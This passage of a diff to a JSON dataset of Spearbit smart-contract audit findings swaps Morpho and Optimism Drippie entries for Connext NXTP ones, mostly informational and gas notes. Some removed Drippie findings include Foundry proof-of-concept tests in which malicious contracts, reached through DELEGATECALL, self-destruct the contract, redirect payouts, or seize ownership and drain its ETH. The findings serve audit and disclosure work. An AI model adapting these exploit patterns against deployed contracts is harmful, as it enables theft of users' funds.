PositionsManager.sol here so for code consistency, it should also be done in Aave-v2.", + "title": "Move nonReentrant from process() to proveAndProcess()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The function process() has a nonReentrant modifier. The function process() is also internal and is only called from proveAndProcess(), so it also possible to move the nonReentrant modifier to function proveAndProcess(). This would save repeatedly setting and unsetting the status of nonReentrant, which saves gas. function proveAndProcess(...) ... { ... for (uint32 i = 0; i < _proofs.length; ) { process(_proofs[i].message); unchecked { ++i; } } } function process(bytes memory _message) internal nonReentrant returns (bool _success) { ... }", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Informational" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "onBehalf argument can be set as the Morpho protocols address", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "When calling the supplyLogic function, currently the _onBehalf argument allows a user to supply funds on behalf of the Morpho protocol itself. While this does not seem exploitable, it can still be a cause for user error and should not be allowed.", + "title": "OpenZeppelin libraries IERC20Permit and EIP712 are final", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The OpenZeppelin libraries have changed IERC20Permit and EIP712 to a final version, so the final versions can be used. OZERC20.sol import \"@openzeppelin/contracts/token/ERC20/extensions/draft-IERC20Permit.sol\"; import {EIP712} from \"@openzeppelin/contracts/utils/cryptography/draft-EIP712.sol\"; draft-IERC20Permit.sol // EIP-2612 is Final as of 2022-11-01. This file is deprecated. import \"./IERC20Permit.sol\"; draft-EIP712.sol // EIP-712 is Final as of 2022-08-11. This file is deprecated. import \"./EIP712.sol\";", "labels": [ "Spearbit", - "MorphoV1", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "maxSortedUsers has no upper bounds validation and is not the same in Compound/Aave-2", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "In MorphoGovernance.sol, the maxSortedUsers function has no upper bounds limit put in place. The maxSortedUsers is the number of users to sort in the data structure. Also, while this function has the MaxSorte- dUsersCannotBeZero() check in Aave-v2, the Compound version is missing this same error check.", + "title": "Use Foundry's multi-chain tests", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Foundry supports multi-chain testing that can be useful to catch bugs earlier in the development process. Local multi-chain environment can be used to test many scenarios not possible on test chains or in production. Since Connectors are a critical part of NXTP protocol.", "labels": [ "Spearbit", - "MorphoV1", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "Consider adding the compound revert error code inside Morpho custom error to better track the revert reason", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "On Compound, when an error condition occurs, usually (except in extreme cases) the transaction is not reverted, and instead an error code (code !== 0) is returned. Morpho correctly reverts with a custom error when this happens, but is not reporting the error code returned by Compound. By tracking, as an event parameter, the error code, Morpho could better monitor when and why interactions with Compound are failing.", + "title": "Risk of chain split", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Domains are considered immutable (unless implementation contracts are redeployed). In case of chain splits, both the forks will continue having the same domain and the recipients won't be able to differentiate which source chain of the message.", "labels": [ "Spearbit", - "MorphoV1", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "liquidationThreshold variable name can be misleading", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "The liquidationThreshold name in Aave is a percentage. The values.liquidationThreshold variable used in Morpho's _getUserHealthFactor is in \"value units\" like debt: values.liquidationThreshold = assetCollateralValue.percentMul(assetData.liquidationThreshold);.", + "title": "Use zkSync's custom compiler for compiling and (integration) testing", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The protocol needs to be deployed on zkSync. For deployment, the contracts would need to be compiled with zkSync's custom compiler. The bytecode generated by the custom Solidity compiler is quite dif- ferent compared to the original compiler. One thing to note is that cryptographic functions in Solidity are being replaced/inlined to static calls to zkSync's set of system precompile contracts.", "labels": [ "Spearbit", - "MorphoV1", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "Users can be liquidated on Morpho at any time when the deprecation flag is set by governance", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "Governance can set a deprecation flag on Compound and Aave markets, and users on this mar- ket can be liquidated by anyone even if they're sufficiently over-collateralized. Note that this deprecation flag is independent of Compound's own deprecation flags and can be applied to any market.", + "title": "Shared logic in SwapUtilsExternal and SwapUtils can be consolidated or their changes would need to be synched.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The SwapUtilsExternal library and SwapUtils share quite a lot of functions (events/...) logics . The main differences are: SwapUtilsExternal.swap does not have the following check but SwapUtils.swap does: // File: connext/libraries/SwapUtils.sol#L715 require(dx == tokenFrom.balanceOf(address(this)) - beforeBalance, \"no fee token support\"); This is actually one of the big/important diffs between current SwapUtils and SwapUtilsExternal. Other differ- ences are: Some functions are internal in SwapUtils, but they are external/public in SwapUtilsExternal. AmplificationUtils is basically copied in SwapUtilsExternal and its functions have been made external. SwapUtilsExternal does not implement exists. SwapUtilsExternal does not implement swapInternal. The SwapUtils's Swap struct has an extra field key as do the events in this file. Some inconsistent formatting. 109", "labels": [ "Spearbit", - "MorphoV1", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "Refactor _computeP2PIndexes to use InterestRateModel's functions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "The InterestRatesManager contracts' _computeP2PIndexes functions currently reimplement the interest rate model from the InterestRatesModel functions.", + "title": "Document why < 3s was chosen as the timestamp deviation cap for price reporting in setDirect- Price", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "setDirectPrice uses the following require statement to filter direct price reports by the owner. require(_timestamp - block.timestamp < 3, \"in future\"); Only prices with _timestamp within 3s of the current block timestamp are allowed to be registered.", "labels": [ "Spearbit", - "MorphoV1", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "Permitting Multiple Drip Calls Per Block", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "state.config.interval is 0. We are currently unaware of use cases where this is desirable. The inline comments correctly note that reentrancy is possible and permitted when Reentrancy is one risk, flashbot bundles are a similar risk where the drip may be called multiple times by the same actor in a single block. A malicious actor may abuse this ability, especially if interval is misconfigured as 0 due to JavaScript type coercion. A reentrant call or flashbot bundle may be used to frontrun an owner attempting to archive a drip or attempting to withdraw assets.", + "title": "Document what IConnectorManager entities would be passed to BridgeFacet", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Document what type of IConnectorManager implementations would the owner or an admin set for the s.xAppConnectionManager. The only examples in the codebase are SpokeConnectors.", "labels": [ "Spearbit", - "OptimismDrippie", - "Severity: Medium Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Version Bump to Latest", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "During the review, a new version of solidity was released with an important bugfix.", + "title": "Second nonReentrant modifier", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "A previous version of xcall() had a nonReentrant modifier. This modifier was removed to enable execute() to call xcall() to return data to the originator chain. To keep a large part of the original protec- tion it is also possible to use a separate nonReentrant modifier (which uses a different storage variable) for xcall()/xcallIntoLocal(). This way both execute and xcall()/xcallIntoLocal() can be called once at the most. function xcall(...) ... { } function xcallIntoLocal(...) ... { } function execute(ExecuteArgs calldata _args) external nonReentrant whenNotPaused returns (bytes32) { }", "labels": [ "Spearbit", - "OptimismDrippie", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "DOS from External Calls in Drippie.executable / Drippie.drip", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "In both the executable and drip (which also calls executable) functions, the Drippie contract interacts with some external contract via low-level calls. The external call could revert or fail with an Out of Gas exception causing the entire drip to fail. The severity is low beacuse in the case where a drip reverts due to a misconfigured or malicious dripcheck or target, the drip can still be archived and a new one can be created by the owner.", + "title": "Return 0 in swapToLocalAssetIfNeeded()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The return in function swapToLocalAssetIfNeeded() could also return 0. Which is somewhat more readable and could save some gas. Note: after studying the compiler output it might not actually save gas. 111 function swapToLocalAssetIfNeeded(...) ... { if (_amount == 0) { return _amount; } ... }", "labels": [ "Spearbit", - "OptimismDrippie", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Use call.value over transfer in withdrawETH", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "transfer is no longer recommended as a default due to unpredictable gas cost changes in future evm hard forks (see here for more background.) While useful to use transfer in some cases (such as sending to EOA or contract which does not process data in the fallback or receiver functions), this particular contract does not benefit: withdrawETH is already owner gated and is not at risk of reentrancy as owner already has permission to drain the contracts ether in a single call should they choose.", + "title": "Use contract.code.length", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Retrieving the size of a contract is done in assembly, with extcodesize(). This can also be done in solidity which is more readable. Note: assembly might be a bit more gas efficient, especially if optimized even further: see issue \"isLocalOrigin can be optimized by using a named return parameter\". LibDiamond.sol function enforceHasContractCode(address _contract, string memory _errorMessage) internal view { uint256 contractSize; assembly { contractSize := extcodesize(_contract) } require(contractSize != 0, _errorMessage); } AssetLogic.sol function isLocalOrigin(address _token, AppStorage storage s) internal view returns (bool) { ... uint256 _codeSize; // solhint-disable-next-line no-inline-assembly assembly { _codeSize := extcodesize(_token) } return _codeSize != 0; }", "labels": [ "Spearbit", - "OptimismDrippie", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Input Validation Checks for Drippie.create", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "Drippie.create does not validate input potentially leading to unintended results. The function should check: _name is not an empty string to avoid creating drip that would be able to read on frontend UI. _config.dripcheck should not be address(0) otherwise executable will always revert. _config.actions.length should be at least one (_config.actions.length > 0) to prevent creating drips that do nothing when executed. DripAction.target should not be address(0) to prevent burning ETH or interacting with the zero address during drips execution.", + "title": "cap and liquidity tokens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The function addLiquidity() also adds tokens to the Connext Diamond contract. If these tokens are the same as canonical tokens it wouldn't play nicely with the cap on these tokens. For others tokens it might also be relevant to have a cap. function addLiquidity(...) ... { ... token.safeTransferFrom(msg.sender, address(this), amounts[i]); ... }", "labels": [ "Spearbit", - "OptimismDrippie", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Ownership Initialization and Transfer Safety on Owned.setOwner", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "Consider the following scenarios. Scenario 1 Drippie allows the owner to be both initialized and set to address(0). If this scenario happens nobody will be able to manage the Drippie contract, thus preventing any of the following operations: Creating a new drip Updating a drips status (pausing, activating or archiving a drip) If set to the zero address, all the onlyOwner operations in AssetReceiver and Transactor will be uncallable. This scenario where the owner can be set to address(0) can occur when address(0) is passed to the construc- tor or setOwner. Scenario 2 owner may be set to address(this). Given the static nature of DripAction.target and DripAction.data there is no benefit of setting owner to address(this), and all instances can be assumed to have been done so in error.", + "title": "Simplify _swapAssetOut()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The function _swapAssetOut() has relative complex logic where it first checks the tokens that will be received and then preforms a swap. It prevents reverting by setting the success flag. However function repayAave- Portal() still reverts if this flag is set. The comments show this was meant for reconcile(), however repaying the Aave dept in the reconcile phase no longer exists. So _swapAssetOut() could just revert if insufficiently tokens are provided. This way it would also be more similar to _swapAsset(). This will make the code more readable and safe some gas. AssetLogic.sol 113 function _swapAssetOut(...) ... returns ( bool success, ...) { ... if (ipool.exists()) { ... // Calculate slippage before performing swap. // NOTE: This is less efficient then relying on the `swapInternalOut` revert, but makes it ,! easier // to handle slippage failures (this can be called during reconcile, so must not fail). ... if (_maxIn >= ipool.calculateSwapInv(tokenIndexIn, tokenIndexOut, _amountOut)) { success = true; amountIn = ipool.swapInternalOut(tokenIndexIn, tokenIndexOut, _amountOut, _maxIn); } } else { ... uint256 _amountIn = pool.calculateSwapOutFromAddress(_assetIn, _assetOut, _amountOut); if (_amountIn <= _maxIn) { success = true; ... amountIn = pool.swapExactOut(_amountOut, _assetIn, _assetOut, _maxIn, block.timestamp + ,! 3600); } } } function swapFromLocalAssetIfNeededForExactOut(...) { ... return _swapAssetOut(_key, _asset, adopted, _amount, _maxIn); } PortalFacet.sol function repayAavePortal(...) { ... (bool success, ..., ...) = AssetLogic.swapFromLocalAssetIfNeededForExactOut(...); if (!success) revert PortalFacet__repayAavePortal_swapFailed(); ... }", "labels": [ "Spearbit", - "OptimismDrippie", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Unchecked Return and Handling of Non-standard Tokens in AssetReceiver", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "The current AssetReceiver contract implement \"direct\" ETH and ERC20 token transfers, but does not cover edge cases like non-standard ERC20 tokens that do not: revert on failed transfers adhere to ERC20 interface (i.e. no return value) An ERC20 token that does not revert on failure would cause the WithdrewERC20 event to emit even though no transfer took place. An ERC20 token that does not have a return value will revert even if the call would have otherwise been successful. Solmate libraries already used inside the project offer a utility library called SafeTransferLib.sol which covers such edge cases. Be aware of the developer comments in the natspec: /// @dev Use with caution! Some functions in this library knowingly create dirty bits at the destination of the free memory pointer. /// @dev Note that none of the functions in this library check that a token has code at all! That responsibility is delegated to the caller.", + "title": "Return default false in the function end", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "verify function is missing a default return value. A return value of false can be added on the function end", "labels": [ "Spearbit", - "OptimismDrippie", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "AssetReceiver Allows Burning ETH, ERC20 and ERC721 Tokens", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "AssetReceiver contains functions that allow the owner of the contract to withdraw ETH, ERC20 and ERC721 tokens. Those functions allow specifying the receiver address of ETH, ERC20 and ERC721 tokens but they do not check that the receiver address is not address(0). By not doing so, those functions allow to: Burn ETH if sent to address(0). Burn ERC20 tokens if sent to address(0) and the ERC20 _asset allow tokens to be burned via transfer (For example, Solmates ERC20 allow that, OpenZeppelin instead will revert if the recipient is address(0)). Burn ERC721 tokens if sent to address(0) and the ERC721 _asset allow tokens to be burned via trans- ferFrom (For example, both Solmate and OpenZeppelin implementations prevent to send the _id to the address(0) but you dont know if that is still true about custom ERC721 contract that does not use those libraries).", + "title": "Change occurances of whitelist to allowlist", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "In the codebase, whitelist is used to represent entities or objects that are allowed to be used or perform certain tasks. This word is not so accurate/suggestive and also can be offensive.", "labels": [ "Spearbit", - "OptimismDrippie", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "AssetReceiver Not Implementing onERC721Received Callback Required by safeTransferFrom.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "AssetReceiver contains the function withdrawERC721 that allow the owner to withdraw ERC721 tokens. As stated in the EIP-721, the safeTransferFrom (used by the sender to transfer ERC721 tokens to the AssetRe- ceiver) will revert if the target contract (AssetReceiver in this case) is not implementing onERC721Received and returning the expected value bytes4(keccak256(\"onERC721Received(address,address,uint256,bytes)\")).", + "title": "Incorrect comment on _mirrorConnector", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The comment on _mirrorConnector is incorrect as this does not denote address of the spoke connector", "labels": [ "Spearbit", - "OptimismDrippie", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Both Transactor.CALL and Transactor.DELEGATECALL Do Not Emit Events", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "Transactor contains a \"general purpose\" DELEGATECALL and CALL function that allow the owner to execute a delegatecall and call toward a target address passing an arbitrary payload. Both of those functions are executing delegatecall and call without emitting any events. Because of the general- purpose nature of these function, it would be considered a good security measure to emit events to track the functions usage. Those events could be then used to monitor and track usage by external monitoring services.", + "title": "addStableSwapPool can have a more suggestive name and also better documentation for the _- stableSwapPool input parameter is recommended", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "1. The name suggests we are adding a new pool, although we are replacing/updating the current one. 2. _stableSwapPool needs to implement IStableSwap and it is supposed to be an external stable swap pool. It would be best to indicate that and possibly change the parameter input type to IStableSwap _stableSwap- Pool. 3. _stableSwapPool provided by the owner or an admin can have more than just 2 tokens as the @notice comment suggests. For example, the pool could have oUSDC, nextUSDC, oDAI, nextDAI, ... . Also there are no guarantees that the pooled tokens are pegged to each other. There is also a potential of having these pools have malicious or worthless tokens. What external pools does Connext team uses or is planning to use? This comment also applies to setupAsset and setupAssetWithDeployedRepresentation.", "labels": [ "Spearbit", - "OptimismDrippie", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Both Transactor.CALL and Transactor.DELEGATECALL Do Not Check the Result of the Execution", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "The Transactor contract contains a \"general purpose\" DELEGATECALL and CALL function that allow the owner to execute a delegatecall and call toward a target address passing an arbitrary payload. Both functions return the delegatecall and call result back to the caller without checking whether execution was successful or not. By not implementing such check, the transaction could fail silently. Another side effect is that the ETH sent along with the execution (both functions are payable) would remain in the Drippie contract and not transferred to the _target. Test example showcasing the issue: contract Useless { // A contract that have no functions // No fallback functions // Will not accept ETH (only from selfdestruct/coinbase) } function test_transactorCALL() public { Useless useless = new Useless(); bool success; vm.deal(deployer, 3 ether); vm.deal(address(drippie), 0 ether); vm.deal(address(useless), 0 ether); vm.prank(deployer); // send 1 ether via `call` to a contract that cannot receive them 8 (success, ) = drippie.CALL{value: 1 ether}(address(useless), \"\", 100000, 1 ether); assertEq(success, false); vm.prank(deployer); // Perform a `call` to a not existing target's function (success, ) = drippie.CALL{value: 1 ether}(address(useless), abi.encodeWithSignature(\"notExistingFn()\"), 100000, 1 ether); assertEq(success, false); assertEq(deployer.balance, 1 ether); assertEq(address(drippie).balance, 2 ether); assertEq(address(useless).balance, 0); ,! } function test_transactorDELEGATECALL() public { Useless useless = new Useless(); bool success; vm.deal(deployer, 3 ether); vm.deal(address(drippie), 0 ether); vm.deal(address(useless), 0 ether); vm.prank(deployer); // send 1 ether via `delegatecall` to a contract that cannot receive them (success, ) = drippie.DELEGATECALL{value: 1 ether}(address(useless), \"\", 100000); assertEq(success, false); vm.prank(deployer); // Perform a `delegatecall` to a not existing target's function (success, ) = drippie.DELEGATECALL{value: 1 ether}(address(useless), abi.encodeWithSignature(\"notExistingFn()\"), 100000); assertEq(success, false); assertEq(deployer.balance, 1 ether); assertEq(address(drippie).balance, 2 ether); assertEq(address(useless).balance, 0); ,! }", + "title": "_local has a misleading name in _addLiquidityForRouter and _removeLiquidityForRouter", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The name for _local parameter is misleading, since it has been used in _addLiquidityForRouter (TokenId memory canonical, bytes32 key) = _getApprovedCanonicalId(_local); and in _removeLiquidityForRouter TokenId memory canonical = _getCanonicalTokenId(_local); and we have the following call flow path: AssetLogic.getCanonicalTokenId uses the adoptedToCanonical mapping first then check if the input parameter is a canonical token for the current domain, then uses representationToCanonical mapping. So here _local could be an adopted token.", "labels": [ "Spearbit", - "OptimismDrippie", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Transactor.DELEGATECALL Data Overwrite and selfdestruct Risks", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "The Transactor contract contains a \"general purpose\" DELEGATECALL function that allow the owner to execute a delegatecall toward a target address passing an arbitrary payload. Consider the following scenarios: Scenario 1 A malicious target contract could selfdestruct the Transactor contract and as a consequence the contract that is inheriting from Transactor. Test example showcasing the issue: 9 contract SelfDestroyer { function destroy(address receiver) external { selfdestruct(payable(receiver)); } } function test_canOwnerSelftDestructDrippie() public { // Assert that Drippie exist assertStatus(DEFAULT_DRIP_NAME, Drippie.DripStatus.PAUSED); assertGt(getContractSize(address(drippie)), 0); // set it to active vm.prank(deployer); drippie.status(DEFAULT_DRIP_NAME, Drippie.DripStatus.ACTIVE); assertStatus(DEFAULT_DRIP_NAME, Drippie.DripStatus.ACTIVE); // fund the drippie with 1 ETH vm.deal(address(drippie), 1 ether); uint256 deployerBalanceBefore = deployer.balance; uint256 drippieBalanceBefore = address(drippie).balance; // deploy the destroyer SelfDestroyer selfDestroyer = new SelfDestroyer(); vm.prank(deployer); drippie.DELEGATECALL(address(selfDestroyer), abi.encodeWithSignature(\"destroy(address)\", deployer), gasleft()); ,! uint256 deployerBalanceAfter = deployer.balance; uint256 drippieBalanceAfter = address(drippie).balance; // assert that the deployer has received the balance that was present in Drippie assertEq(deployerBalanceAfter, deployerBalanceBefore + drippieBalanceBefore); assertEq(drippieBalanceAfter, 0); // Weird things happens with forge // Because we are in the same block the code of the contract is still > 0 so // Cannot use assertEq(getContractSize(address(drippie)), 0); // Known forge issue // 1) Forge resets storage var to 0 after self-destruct (before tx ends) 2654 -> https://github.com/foundry-rs/foundry/issues/2654 // 2) selfdestruct has no effect in test 1543 -> https://github.com/foundry-rs/foundry/issues/1543 assertStatus(DEFAULT_DRIP_NAME, Drippie.DripStatus.PAUSED); ,! } Scenario 2 The delegatecall allows the owner to intentionally, or accidentally, overwrite the content of the drips mapping. By being able to modify the drips mapping, a malicious user would be able to execute a series of actions like: Changing drips status: Activating an archived drip Deleting a drip by changing the status to NONE (this allows the owner to override entirely the drip by calling again create) Switching an active/paused drip to paused/active 10 etc.. Change drips interval: Prevent a drip from being executed any more by setting interval to a very high value Allow a drip to be executed more frequently by lowering the interval value Enable reentrancy by setting interval to 0 Change drips actions: Override an action to send drips contract balance to an arbitrary address etc.. Test example showcasing the issue: contract ChangeDrip { address public owner; mapping(string => Drippie.DripState) public drips; function someInnocentFunction() external { drips[\"FUND_BRIDGE_WALLET\"].config.actions[0] = Drippie.DripAction({ target: payable(address(1024)), data: new bytes(0), value: 1 ether }); } } 11 function test_canDELEGATECALLAllowReplaceAction() public { vm.deal(address(drippie), 10 ether); vm.deal(address(attacker), 0 ether); // Create an action with name \"FUND_BRIDGE_WALLET\" that have the function // To fund a wallet vm.startPrank(deployer); string memory fundBridgeWalletName = \"FUND_BRIDGE_WALLET\"; Drippie.DripAction[] memory actions = new Drippie.DripAction[](1); // The first action will send Bob 1 ether actions[0] = Drippie.DripAction({ target: payable(address(alice)), data: new bytes(0), value: 1 ether ,! }); Drippie.DripConfig memory config = createConfig(100, IDripCheck(address(checkTrue)), new bytes(0), actions); drippie.create(fundBridgeWalletName, config); drippie.status(fundBridgeWalletName, Drippie.DripStatus.ACTIVE); vm.stopPrank(); // Deploy the malicius contract vm.prank(attacker); ChangeDrip changeDripContract = new ChangeDrip(); // make the owner of drippie call via DELEGATECALL an innocentfunction of the exploiter contract vm.prank(deployer); drippie.DELEGATECALL(address(changeDripContract), abi.encodeWithSignature(\"someInnocentFunction()\"), 1000000); ,! // Now the drip action should have changed, anyone can execute it and funds would be sent to // the attacker and not to the bridge wallet drippie.drip(fundBridgeWalletName); // Assert we have drained Drippie assertEq(attacker.balance, 1 ether); assertEq(address(drippie).balance, 9 ether); } Scenario 3 Calling a malicious contract or accidentally calling a contract which does not account for Drippies storage layout can result in owner being overwritten. Test example showcasing the issue: contract GainOwnership { address public owner; function someInnocentFunction() external { owner = address(1024); } } 12 function test_canDELEGATECALLAllowOwnerLoseOwnership() public { vm.deal(address(drippie), 10 ether); vm.deal(address(attacker), 0 ether); // Deploy the malicius contract vm.prank(attacker); GainOwnership gainOwnershipContract = new GainOwnership(); // make the owner of drippie call via DELEGATECALL an innocentfunction of the exploiter contract vm.prank(deployer); drippie.DELEGATECALL(address(gainOwnershipContract), abi.encodeWithSignature(\"someInnocentFunction()\"), 1000000); ,! // Assert that the attacker has gained onwership assertEq(drippie.owner(), attacker); // Steal all the funds vm.prank(attacker); drippie.withdrawETH(payable(attacker)); // Assert we have drained Drippie assertEq(attacker.balance, 10 ether); assertEq(address(drippie).balance, 0 ether); }", + "title": "Document _calculateSwap's and _calculateSwapInv's calculations", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "In _calculateSwap, the -1 in dy = xp[tokenIndexTo] - y - 1 is actually important. This is be- cause given no change in the asset balance of all tokens that already satisfy the stable swap invariant (dx = 0), getY (due to rounding errors) might return: y = xp[tokenIndexTo] which would in turn make dy = -1 that would revert the call. This case would need to be investigated. y = xp[tokenIndexTo] - 1 which would in turn make dy = 0 and so the call would return (0, 0). y = xp[tokenIndexTo] + 1 which would in turn make dy = -2 that would revert the call. This case would need to be investigated. 117 And similiarly in _calculateSwapInv, doing the same analysis for + 1 in dx = x - xp[tokenIndexFrom] + 1, if getYD returns: xp[tokenIndexFrom] +1, then dx = 2; xp[tokenIndexFrom], then dx = 1; xp[tokenIndexFrom] - 1, then dx = 0; Note, that the behavior is different and the call would never revert.", "labels": [ "Spearbit", - "OptimismDrippie", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Use calldata over memory", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "Some gas savings if function arguments are passed as calldata instead of memory.", + "title": "Providing the from amount the same as the pool's from token balance, one might get a different return value compared to the current pool's to balance", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Note, due to some imbalance in the asset pool, given x = xp[tokenIndexFrom] (aka, no change in asset balance of tokenIndexFrom token in the asset pool), we might see a decrease or increase in the asset balance of tokenIndexTo to bring back the pool to satisfying the stable swap invariant. One source that can introduce an imbalance is when the scaled amplification coefficient is ramping.", "labels": [ "Spearbit", - "OptimismDrippie", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Avoid String names in Events and Mapping Key", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "Drip events emit an indexed nameref and the name as a string. These strings must be passed into every drip call adding to gas costs for larger strings.", + "title": "Document what type 0 means for TypedMemView", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "In the following line, 0 is passed as the new type for a TypedMemView bytes29 _message.slice(PREFIX_LENGTH, _message.len() - PREFIX_LENGTH, 0) But there is no documentation as to what type 0 signifies.", "labels": [ "Spearbit", - "OptimismDrippie", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Avoid Extra sloads on Drippie.status", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "Information for emitting event can be taken from calldata instead of reading from storage. Can skip repeat drips[_name].status reads from storage.", + "title": "Mixed use of require statements and custom errors", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The codebase includes a mix of require statements and custom errors.", "labels": [ "Spearbit", - "OptimismDrippie", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Use Custom Errors Instead of Strings", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "To save some gas the use of custom errors leads to cheaper deploy time cost and run time cost. The run time cost is only relevant when the revert condition is met.", + "title": "WatcherManager can make watchers public instead of having a getter function", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "WatcherManager has a private mapping watchers and a getter function isWatcher() to query that mapping. Since WatcherManager is not inherited by any other contract, it is safe to make it public to avoid the need of an explicit getter function.", 